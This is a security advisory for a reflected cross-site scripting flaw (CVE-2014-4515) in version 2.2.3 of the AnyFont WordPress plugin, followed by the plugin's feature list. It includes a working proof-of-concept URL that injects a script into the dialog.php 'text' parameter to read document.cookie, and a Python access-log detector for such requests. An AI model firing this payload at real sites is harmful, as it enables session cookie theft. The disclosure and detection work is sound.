wp-plugin : anyfont – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : anyfont

 

Affected Version : 2.2.3 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/anyfont/mce_anyfont/dialog.php?text=text%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
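One way to spot requests matching this PoC in web server access logs, as an added example that is not part of the original advisory. It assumes combined-format log lines; the function names are hypothetical and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path suffix and parameter name come from the advisory's PoC URL.
TARGET_SUFFIX = "/anyfont/mce_anyfont/dialog.php"
PARAM = "text"
# Characters that let a value close an HTML attribute or open a tag.
BREAKOUT = re.compile(r'["<>]')
# Request field of a combined-format access log line (log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that %253C is still seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_text_param(log_line):
    """Return the decoded 'text' value if the request hits dialog.php with markup in it, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(TARGET_SUFFIX):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)  # parse_qs has already decoded one layer
        if BREAKOUT.search(value):
            return value
    return None

# Constructed sample log lines (hypothetical hosts and timestamps; line 2 reuses the advisory's PoC query).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2014:10:00:00 +0000] "GET /wordpress/wp-content/wp-plugs/anyfont/mce_anyfont/dialog.php?text=Hello%20World HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/May/2014:10:01:00 +0000] "GET /wordpress/wp-content/wp-plugs/anyfont/mce_anyfont/dialog.php?text=text%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1" 200 640',
    '203.0.113.9 - - [28/May/2014:10:02:00 +0000] "GET /wordpress/wp-content/wp-plugs/anyfont/mce_anyfont/dialog.php?text=%2522%253E HTTP/1.1" 200 520',
    '203.0.113.7 - - [28/May/2014:10:03:00 +0000] "GET /wordpress/index.php?text=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = suspicious_text_param(line)
        print("FLAG" if hit is not None else "ok  ", repr(hit))
```
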

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4515

 
Plugin Description :
 
AnyFont allows you to automatically set any custom TrueType or OpenType font absolutely anywhere you want on your WordPress site.

Easily embed your custom fonts directly into your web pages using the new "@font-face" CSS rule. The new and improved Font Manager now includes the option to convert fonts to all the different webfont formats with a single click (requires free sign up at [FontServ.com](http://fontserv.com)).

CSS3 "@font-face" support means you can now embed fonts into web pages and enable everyone to see your custom fonts without using any images, Flash or JavaScript.

**Upgrade your [FontServ.com](http://fontserv.com/) account to Pro for only $16 per year!**

**Features:**

* WPMU/WordPress 3 compatible with full support for multiple sites.
* Font Manager to easily upload truetype or opentype fonts to WordPress
* Easily convert your fonts to webfont formats. (Requires free sign up at [FontServ.com](http://fontserv.com/))
* FontServ webfonts [support all the major browsers](http://fontserv.com/help/) including Internet Explorer.
* Character Map to quickly check which characters are available for each font.
* Style Management which allows an unlimited number of different styles to be created.
* Apply font shadows easily using the Style Manager.
* TinyMCE Button for quick and easy insertion of AnyFont styled text into your posts or pages.
* Image Cache for generated images plus browser caching is enabled for images to reduce page load times.
* Cache overview and management tool.
* Easy text replacement options for menus, post titles, page titles, widget titles, blog name and blog description.
* Advanced option which allows you to apply styles to any element or CSS selector (class name or ID).
* Image replacements are SEO compatible.
* Help icon for every single option to guide you when setting things up for the first time.
* Image Styles support either PHP4+GD or PHP5+Imagick/GD.
* Officially tested on Apache and Microsoft IIS (Windows 2008 R2 Enterprise running IIS 7), but is also known to work with nginx and various other web servers.

**Translations:**

* Belarusian - [FatCow](http://www.fatcow.com)
* Turkish
* Dutch - [WP Webshop](http://wpwebshop.com)
* German - [Maco](http://www.macozoll.de)
* Russian - [Sasha](http://forex-trader.pp.ua/)
* Ukrainian - [Pavel](http://wlstyling.crimea.ua/)
* French - [Web Hub](http://www.webhostinghub.com/)
* Azerbaijani - [Bohdan Zograf](http://webhostingrating.com/)
